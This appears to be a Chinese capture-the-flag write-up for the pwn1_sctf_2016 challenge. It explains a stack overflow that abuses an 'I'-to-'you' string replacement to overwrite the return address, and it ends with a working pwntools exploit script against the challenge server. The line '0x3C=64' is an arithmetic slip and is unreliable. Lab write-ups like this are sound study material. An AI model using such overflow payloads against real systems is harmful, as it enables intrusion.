原创

: PWN (3) pwn1_sctf_2016 1

PWN (3) pwn1_sctf_2016 1

查找字符串,发现了一个flag.txt。

输入在这里
限制为32长度的输入
在这里插入图片描述
在这里插入图片描述看到EBP的地址
这个flag的地址是08048F0D

在这里插入图片描述这个基准位置EBP(0x00000000)的下面一个就是EIP

图示如下,我觉得我已经明白了

±————–+
|ESP |
±————–+
| buf |
±————–+
| 填充物 |
±————–+
| EBP |
±————–+
| EIP |
±————–+
| … …|
| 内存高址 |

S的容量是32.

这里有fget 函数约束,不能输入超过32B的字符
那么要溢出到eip的位置,劫持返回地址,就必须要达到3C的大小。才能够覆盖到eip
原则上是不可能有那么长的,但是后面有一个replace 函数,把’I’替换为了’you’,那么I就是3个长度位了。
在这里插入图片描述0x3C=64=20*3+4

1
2
3
4
5
6
7
8
9
10
from pwn import *

p = remote('node3.buuoj.cn', '28482')
payload = b'I'* 20+b'a'*0x4+ p32(0x08048F0D)
p.sendline(payload)

p.interactive()